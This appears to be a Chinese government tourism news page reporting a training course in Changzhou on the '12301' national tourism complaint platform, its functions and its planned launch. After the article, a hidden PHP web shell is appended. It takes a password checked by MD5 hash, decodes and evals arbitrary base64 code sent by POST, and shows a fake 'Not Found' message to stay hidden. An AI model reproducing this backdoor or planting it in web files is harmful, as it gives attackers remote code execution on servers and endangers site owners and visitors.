旅游政策法规

首页 > 政策法规 > 旅游政策法规 >

    国家旅游局“12301全国旅游投诉举报平台”操作培训班在常州召开

           9月21日,由国家旅游局主办的“12301全国旅游投诉举报平台”操作培训班在江苏常州举办。

    来自全国各省、自治区、直辖市旅游发展委员会、旅游局,新疆生产建设兵团旅游局质监执法骨干60余人参加了培训,国家旅游局监管司和质监所相关领导出席并主持了会议。
           会议中,12301国家智慧旅游公共服务平台相关专家向各位培训班成员分别从新系统特点、投诉处理流程、新系统操作和演示等方面介绍了全国旅游投诉举报平台。该平台改变了传统的旅游投诉处理工作手段,集合了全媒体客服、数据中心、投诉管理、企业协同等功能,实现了属地直达、全程监控、专业服务、企业协同、多渠道申请、统一入口的闭环投诉管理,是各级旅游质监执法人员受理及处理旅游投诉的统一平台。
           新系统的主要功能模块有投诉单管理和数据报表分析、消息提醒及监控、权限账号分级管理。平台上线后,投诉单将直达属地,投诉审批个性化开关选择的功能大大缩短了投诉处理时效。同时,投诉处理过程全程透明化,实时同步进度及状态,加快投诉处理进度,实现了各旅游质监所与涉旅企业的无缝对接,全面实行电子化处理。
           会议结束后,全体培训班成员参观了12301国家智慧旅游公共服务平台基地,并亲自进行了旅游投诉举报平台的上机模拟操作。
           据悉,12301旅游投诉举报平台将于9月25日正式上线,以确保在即将到来的十一旅游高峰中能更好地服务于游客投诉,提升旅游投诉处理工作水平,也为从旅游投诉处理工作的源头上为推进全域旅游发展战略奠定基础。
"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>